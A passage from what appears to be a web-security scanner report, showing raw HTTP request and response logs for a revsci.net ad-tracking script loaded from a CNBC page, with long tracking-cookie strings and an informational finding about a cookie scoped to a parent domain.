Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_h_EP="MLsXtSMNZzhvJZE469JExPALrEtuUCF+EhmSre0boepdUBIObzB9/hpep6V9WP6iKc7UM3kZLkCjMiOiDplQ2CF4IisZwIwt6cjzZV49YeXrO4RztUIbcgKhZWW1AQyxTat59KHG1ZYgPGTNKk4xnTkFyZxw+3FBOTrvF7ibA99KM40NQSOQnxbHjygVH4B6xruJK0Es/gqj/f1mY82bG0rmbM87cRnGxrw1R74p2+EcoSlGfE0Uv1xJBKPALi/3LkMV6EuvWnHavCtgFKMhOAT7Yzi9hOpfBpOhKCak+Xm5yGazFloFyqug1r6+XnaIbTus0g7CBXvRgUE4uxJMQOzzafUkf+aVloA03BZQhLexW2KEUa1VyRWJeibvyhZfhKWxM22JnUB07A4hem20B8pAuaWxU6P2Xl94lsiR4CDQ2W/x3pAgE4adw7tqAQauEMn+yFmPwKJl9zulY68ubXhEyCepWQQISOEvXsr2JLWN6TNq52h7EZbd6Cjhenx1Le53fztyyxCcmpqba7abpabHv8Eto8YuVna4HLGszN+spCjrSqvUONmpZa/4jV6AG/56LhIR08w0XzOlepvq5R+A+4Si5I4vs+Rusf9m+BCUtO8isP5wPWd1BYAsx3FwuhZIewaCAWsGRDpaspDUFNLkxjApdEwHSh0ESLnuk/ribaLBM3MStzx5T4TkOyfsXsGz5NLi3WESm7GOIkLZhTKsw2Fvy/p3cIedmIYu2MYKeciKsClkdQJ5c/+E988BwQ8Fc/LK7DuatOMGewSPDsRm2bguiGAFzqlsW8+pbPuPA1O1mUvEqO94XTi7OV+ZlQ2PiaLsIk7fEESXnKzTCZzTrwJPC8f7RD6nXOz1LDR8bcItkxZHxzzwsz2OrNsTm/NvKFkudk2JN0lHBuuTThU/0MT7oiMNI+khnWWjxoPcQ/jJ1+Id4As3OZ98ti1ToEf5lT8Z/XvxcbfqpubNRvGw4bSeTDg9eUZfKhO4XspYgSQneW9GpuCp7EP5MfcSET8/iU5a27wX37Y/5mYIe/G5WMwtyEYL+DEbTqOqDDt2Nm9oCdEHY9LDohaEiRpkA7oPQvpZ67A8tr+2W8xTgPePhBWdasYREELSz4Hyn0xJ9lVMrqGngAOIdVc1pWfvI+xLE11UtTb+U/kHPSswZorhN+W3aj+eXEmCS3h22oU5mRVUmRiNVy1CWtsxbXCXHE/P7ekBtKJRO7pNJeZEmEizyhF+owLt8BRjGcXNFxv/RTlDNjWSwYjjXwKei7oSypuNnEy23XoboP/ZXSSsXczClAMtdXz8KbWO7X3NMY2PF4h5Razbs+pURmdNw/QufXZZGv3Cl88IWTTdVSUAjV+Dc8Te"; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+ztEYK15PGwYZjOhZvBYWyDHtgBQLsFjyJCk8YM/Hg5qLS9hklPZNAmJwI76E2tgkAXShTgzx+Bxp1K1pS+qjAdJg12dAr0OlVHYArWmlUHR1/gYZp7URNgAjiVIWy36LdaChH7UY0QbTd5R+dnWDAc1Pbw5/T6RTLrI3embgsXY2Ux04NpfEVBDcSUpOAWiA9m9dwj4pz3Kw+U7qTi1BGBYpqFEqmeFdWn6+pl8c3vMQK3RauywuPKr6SnIG792z+rV5MZBV/csFD/2PfaKApGdSDfF1b4bHbOktjD4I6xK6EUpSwB3Sv4dqnkXuCiPQcDQyIz4tlpCFR6tV7WQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq45Gn+ogVIoovKejgnrSPJ3o2oOsHVZ6ASfr8mCVOA5yDWU5JEaZB0Ph1unPzp9+wabLK1rUsJWQhPwUXcd5Llnon2TewxkUnmRYJ73tH392wXrp1ISMKLzxpzGsmT/evH/aXvAKqFEOUR10iutfvafjcB1LnB0jDMOlYXuIeGf1Wg5DQIrYXD6FCdYCnMdnecccbs7u/mc8fAX83E9pgEmRJ3LXPHlkte2HeDB6BsrcxnSv0l6Zg78apOPubX52OcSFvO6lYmbfNANeNi1Y4JUsIlGc1evKXfTnhY6Ri+e0i4qUtEy0n4T+sLU8Hp/icy+xbB8sPUximdSS9Q4We7+Snv5kYk85bfMnFuJ+IEzKaBl6aqZQ4ZvHoJq87z4S12lB/dF/R8aClBsKke+SOtUVddKniqvrHVs900YQCLT9OYzFt00dJNgaw1uus0Vq0IqNQcAjcwDi0z48fOO29R84sy/SW1+6zN7vch1/H6Cds3eX+q1eRrNTYsHd4Wm/Nm0vBO5Ly4FGAtXo6cxHUXJJmcTHr68PZRAb1FkVuW+Y2BBfGnUECgADEUpcHeqHtcMfEGpwwjQXxru1bogLKOtfzrGrcLSacrROzrbUw+iXBU+UhRSERrOVjfSm85YXJGRUmsbUl4N1jHwLxU5v+/s7YjN55ddodLDL7S0NQwPbYOWgSarqjgKLvS9VuAzK1B4LzbDSrujeBs50PvjAL74nQ7+JsRs09Y2MYg7EYLt6Ob3vK5fKFaaUT2FszpzI0O/j2+9fl+UrnC4nrOqmQsJD7w+heP2vczngNolVqEOp3A6tXw+ue6oGalEgPw4AySOS6NO3jBCcso0eAbd4R7xFyuVh6dJYSGpNyH/H9xlAPZcWBhblBTHbFirBft1hUbJwbMv/z5C0MimBcz2K+ncZ7QfhywkpmDlJibnOItIQioGZoVtGZIgVhuwK9pY+z0MUVFV1ok09IdoJE/Y8ROVxRRtGIdnYgygsbaFzV0EzCGuxqAwojOpfaVmIkjHS/ypY5ATViNWvwuyDJ9sd/rKUIVOE0X3q/WWyN04xvfmym8s4XsxoyIR70BtX0Cz8CIKqCNyk2Wd6aDEkSMysZlkDU6mC1MbwLDLDznUAsp6Kvb2zfN8VpwPFUyz8KzuXDHtcugSUzgpVUIfBmksylXzod3HWwofrUlz/BZtn1/O21gynVl/WjVkT4K/wOj3On8y2eMRI91ks5rMdmiMVUPllKyPfc4Jq+e3sAhWMA/Lgje4EEFdZGEsdfyhIDkNjMbfFqwDzOJ6wmxgFP+i9DYnCU9oX7KVRZK1gH4p10hh1LiIhpdxzGpKAdocOA/gySKD/SSZ1c0JnXpSX0Zlei9Qw4VTSne2ip9FhQb+7knoZybST30y9Av4ti4o8="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXZ8qnxnNHqGrp84hH/bhN0xQOPPp9YTKMTz5jLRWbQcdYbDr7Hjqv0yExhy1fy3n104B0a6KC4V5fwl/ueW59kACHLWrA+OydZDjZS9CIFnDETNjcdmwWlQPRzO+JjeN8UHPBRTjLTQMJBSE/72npdUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9NtGZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+URhAE83doE5n/Jh7rUvLssOKNIl0z9NOW8n0Io1Z0J+sMQ+tZ6lcs5hXNNM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU4gSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoEridsU/hQklS2zn/pSli2Rtkys7Cu8F3vwD23Ocs5M84e0l41ypjZYa9NNMjP/hg2a3P12VkLJJJbFyyvvcQ5CQO2cz4UB2K2EQhvUfC08cNafWRTmSV2FwxnXs29jI+nkMU8QmD0Bw1ao85QIlZkQZOLlk8uZWjFC67AWXT7UY7ZfMhzB3jROUkKH71DeERmutZ0nwCpSMd1gSceTdwz3s/hdPZOKqyKJC4V5f1N/ueW59kACHLWrA+OydZDjZS9CIFnDETP3cdmwWlQPRzO+JjeN8UGRBRTjLTQMJBSEhb3PpNUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQsSUoLnATqy/tiKdn75egfCW6fd5NtGZUI+/7w3o0IhSHSQw8NLNwy4LRWKIS+7LyZ9TiE7e99bDIy6bGQBwxkT6ha/M3fu5OW8n0Io1Z0J+sMQ+tZ6lcs2ZkNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:31:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:31:32 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.190. http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/773834418.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtOYbK3cCc/jF4tZOI4ZaDiAcniGiXBSKKyJVvRZxbwn/ueWxekEi2xHb40hIvIhWgfLCLgssvxCqQjtw/Xfz8sAmsgAmGWKbk2k07Pni/xK23tz8t96F0V0W1LQ+5EdE6wJ2SwOpge0ECfCi6hGNHqCcmpBdYdZho+uLCE6vyBtQLChUXPl+uuC8vCr9Xa+mttDWNRKHSQw0cLNwnCnp3H2FRAEywdItUzNBpaGUnzS+EJINB46ubsBm79Ct6Yvm9ps8vXKyABn16OytJdRoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:02:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/773834418.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa